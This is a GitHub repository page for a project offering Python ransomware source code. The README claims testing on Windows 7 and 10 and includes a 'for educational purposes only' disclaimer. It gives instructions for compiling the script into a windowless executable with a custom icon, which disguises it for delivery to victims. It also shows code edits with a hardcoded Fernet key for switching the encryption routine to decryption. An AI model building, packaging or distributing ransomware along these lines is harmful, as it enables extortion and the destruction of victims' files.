Skip to content

markwh245/Python-Ransomware

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

35 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Python-Ransomware

Complete Python RansomeWare Source Code With Full Decoumetions.

   ____ ____ _  _ ____ ____ _  _ _ _ _ ____ ____ ____  ___  _   _ 
   |__/ |__| |\ | [__  |  | |\/| | | | |__| |__/ |___  |__]  \_/  
   |  \ |  | | \| ___] |__| |  | |_|_| |  | |  \ |___ .|      |   

About: This is a Classic Example Of RansomWare Written in python.
Tested On: Windows 10 / Windows7
Suport : +Windows7
Date of Publish : 10/31/2019
Went Find out about what is Ransomware

   When Find out about what is Ransomware ? -> Click Hare <- 

To Convet the .py to exe You can use pyinstaller.
To install pyinstaller: https://www.pyinstaller.org
To Convet .py File to exe : pyinstaller --onefile -w --icon YourIcon.ico Ransomware.py

To Decript Files :

Change Ransomware.py On line 48 From :
To This :


FileName = loc.Target # File name
Encrypted = loc.FernetM.decrypt(Date) # Channge Encrypt To decrypt tmp Var

And line 27 From this :

to This:


Key = b'68pNFX3kb9GplysL7XKfpdLLhlSrwZFEnFUuy54nEyY # Replace Your Key hare
FKey = Fernet(Key) # Our Fernet Moudle

  • P.S: This is just Concept and its still work in the progress
  • NOTE: THIS SOURCE CODE IS For Educational Purposes Only.
    IM NOT RESBONBLE FOR ANY BAD & MALICIOUS USE OF IT.

    About

    Complete Python RansomeWare Source Code With Full Decoumetions.

    Resources

    License

    Stars

    Watchers

    Forks

    Releases

    No releases published

    Packages

     
     
     

    Contributors

    Languages

    • Python 100.0%